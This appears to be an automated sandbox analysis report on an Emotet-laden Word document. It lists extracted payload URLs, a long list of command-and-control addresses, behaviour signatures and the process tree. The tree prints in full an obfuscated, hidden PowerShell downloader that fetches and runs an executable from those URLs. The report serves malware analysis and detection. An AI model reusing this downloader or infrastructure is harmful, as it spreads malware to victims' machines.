Analysis
-
max time kernel
151s -
resource
win10v191014 -
submitted
19-12-2019 23:54
Task
task1
Sample
Docs_5fac5a99c133685dfa34c3192e27fa7b.17.doc
Resource
win7v191014
General
Malware Config
Extracted
https://laclinika.com/wp-admin/r42ar70/
https://thechasermart.com/wp-admin/7u93/
https://zamusicport.com/wp-content/Vmc/
https://zaloshop.net/wp-admin/8j0827/
https://www.leatherbyd.com/PHPMailer-master/q91l5u01353/
Extracted
emotet
68.187.160.28:443
97.120.32.227:80
187.188.166.192:8080
144.217.117.207:8080
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
68.174.15.223:80
63.246.252.234:80
93.148.252.90:80
74.59.187.94:80
185.160.212.3:80
46.28.111.142:7080
183.99.239.141:80
68.129.203.162:443
144.139.56.105:80
191.183.21.190:80
81.157.234.90:8080
138.68.106.4:7080
203.130.0.69:80
181.36.42.205:443
190.97.30.167:990
94.200.114.162:80
149.62.173.247:8080
188.216.24.204:80
85.152.208.146:80
116.48.138.115:80
50.28.51.143:8080
190.210.184.138:995
83.165.78.227:80
68.183.170.114:8080
186.15.83.52:8080
93.67.154.252:443
74.79.103.55:80
152.170.108.99:443
111.125.71.22:8080
68.183.190.199:8080
93.144.226.57:80
82.8.232.51:80
37.187.6.63:8080
200.58.83.179:80
217.199.160.224:8080
86.42.166.147:80
91.74.175.46:80
97.81.12.153:80
125.99.61.162:7080
207.154.204.40:8080
14.160.93.230:80
87.106.77.40:7080
109.169.86.13:8080
91.205.215.57:7080
82.196.15.205:8080
96.61.113.203:80
181.198.203.45:443
130.204.247.253:80
5.88.27.67:8080
82.36.103.14:80
2.45.112.134:80
190.6.193.152:8080
63.248.198.8:80
51.255.165.160:8080
189.19.81.181:443
186.68.48.204:443
2.44.167.52:80
163.172.40.218:7080
201.213.32.59:80
151.237.36.220:80
77.55.211.77:8080
37.183.121.32:80
112.218.134.227:80
77.27.221.24:443
190.186.164.23:80
175.114.178.83:443
45.50.177.164:80
87.106.46.107:8080
91.204.163.19:8090
188.135.15.49:80
190.195.129.227:8090
159.203.204.126:8080
104.131.58.132:8080
185.86.148.222:8080
46.101.212.195:8080
223.255.148.134:80
79.7.114.1:80
80.11.158.65:8080
190.100.153.162:443
203.25.159.3:8080
2.139.158.136:443
72.29.55.174:80
73.60.8.210:80
37.211.49.127:80
212.71.237.140:8080
5.196.35.138:7080
185.160.229.26:80
91.83.93.124:7080
69.163.33.84:8080
45.8.136.201:80
83.248.141.198:80
200.119.11.118:443
219.75.66.103:80
118.36.70.245:80
192.241.146.84:8080
45.79.95.107:443
116.48.148.32:80
62.75.160.178:8080
142.127.57.63:8080
62.75.143.100:7080
119.59.124.163:8080
181.61.143.177:80
200.124.225.32:80
5.32.41.106:80
37.120.185.153:443
96.38.234.10:80
110.170.65.146:80
190.146.131.105:8080
2.42.173.240:80
191.103.76.34:443
91.117.83.59:80
58.171.38.26:80
178.79.163.131:8080
113.61.76.239:80
99.252.27.6:80
139.162.118.88:8080
165.228.195.93:80
212.237.50.61:8080
142.93.114.137:8080
Signatures
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4904 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4476 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4476 Powershell.exe 4988 niccors.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4476 wrote to memory of 4292 4476 Powershell.exe 79 PID 4292 wrote to memory of 3360 4292 637.exe 82 PID 3352 wrote to memory of 4988 3352 niccors.exe 87 -
Executes dropped EXE 4 IoCs
pid Process 4292 637.exe 3360 637.exe 3352 niccors.exe 4988 niccors.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4904 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4904 WINWORD.EXE 4292 637.exe 3360 637.exe 3352 niccors.exe 4988 niccors.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4476 4916 Powershell.exe 71 -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 3360 637.exe 4988 niccors.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies niccors.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 niccors.exe File renamed C:\Users\Admin\637.exe => C:\Windows\SysWOW64\niccors.exe 637.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat niccors.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 niccors.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE niccors.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_5fac5a99c133685dfa34c3192e27fa7b.17.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4904
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABTAHEAbgB1AHAAcwB1AHkAPQAnAEsAbABsAG0AaQByAGsAZwBhAGMAYwAnADsAJABIAHQAdABlAGYAZQBtAHIAawB5AGEAcAB3ACAAPQAgACcANgAzADcAJwA7ACQAVABiAGgAeABuAHMAbwBoAG0AYgBmAGoAPQAnAFUAZgBtAHUAbgBvAHUAdABiAGUAYwBoACcAOwAkAE8AeQBpAGwAcwBlAGUAYwBmAHgAegBjAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAdAB0AGUAZgBlAG0AcgBrAHkAYQBwAHcAKwAnAC4AZQB4AGUAJwA7ACQAVwBuAGIAYgBnAHQAYQBuAGwAPQAnAE4AYgBkAHoAagBoAHoAYgBzAGwAJwA7ACQASwBkAHMAegB1AHMAZABiAHMAcwB4AD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMAbABpAGUAbgBUADsAJABaAGEAYwBmAGwAdABkAHIAYwBrAHoAdQA9ACcAaAB0AHQAcABzADoALwAvAGwAYQBjAGwAaQBuAGkAawBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwByADQAMgBhAHIANwAwAC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGUAYwBoAGEAcwBlAHIAbQBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwB1ADkAMwAvACoAaAB0AHQAcABzADoALwAvAHoAYQBtAHUAcwBpAGMAcABvAHIAdAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAbQBjAC8AKgBoAHQAdABwAHMAOgAvAC8AegBhAGwAbwBzAGgAbwBwAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwA4AGoAMAA4ADIANwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbABlAGEAdABoAGUAcgBiAHkAZAAuAGMAbwBtAC8AUABIAFAATQBhAGkAbABlAHIALQBtAGEAcwB0AGUAcgAvAHEAOQAxAGwANQB1ADAAMQAzADUAMwAvACcALgAiAHMAcABgAGwAaQB0ACIAKAAnACoAJwApADsAJABIAGQAdgB6AGEAYQBjAHYAZwBjAGcAPQAnAEEAZABjAHcAcgBoAHQAcABqAHoAbQBxAHUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFEAawBpAHUAeAByAHkAagB3AGsAbwAgAGkAbgAgACQAWgBhAGMAZgBsAHQAZAByAGMAawB6AHUAKQB7AHQAcgB5AHsAJABLAGQAcwB6AHUAcwBkAGIAcwBzAHgALgAiAGQATwB3AE4ATABPAEEAYABEAGAARgBgAEkATABlACIAKAAkAFEAawBpAHUAeAByAHkAagB3AGsAbwAsACAAJABPAHkAaQBsAHMAZQBlAGMAZgB4AHoAYwBuACkAOwAkAEQAZgB4AHcAYgB4AHQAeQBrAHQAYQBtAGoAPQAnAEsAdQBzAGEAagBkAHcAZQBhACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATwB5AGkAbABzAGUAZQBjAGYAeAB6AGMAbgApAC4AIgBsAGAARQBuAGAARwBUAEgAIgAgAC0AZwBlACAAMgAzADUAMQAyACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABgAEEAUgB0ACIAKAAkAE8AeQBpAGwAcwBlAGUAYwBmAHgAegBjAG4AKQA7ACQAWQBkAGkAaQBnAGoAZgBzAD0AJwBLAGkAYQBoAGYAcwBkAHEAdQAnADsAYgByAGUAYQBrADsAJABEAHAAcwB5AHQAaAB0AGcAYgB3AHIAPQAnAFUAdgBiAGsAdQBjAGQAaQBmAGYAawBqAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABiAGoAagByAG0AdQBuAHEAawBtAGIAbQA9ACcASQBzAGkAZABtAGsAcQBzAHcAcgBnAGUAeQAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
PID:4476 -
C:\Users\Admin\637.exe"C:\Users\Admin\637.exe"2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4292 -
C:\Users\Admin\637.exe--3b63a3583⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:3360
-
-
-
C:\Windows\SysWOW64\niccors.exe"C:\Windows\SysWOW64\niccors.exe"1⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3352 -
C:\Windows\SysWOW64\niccors.exe--e05864ab2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4988
-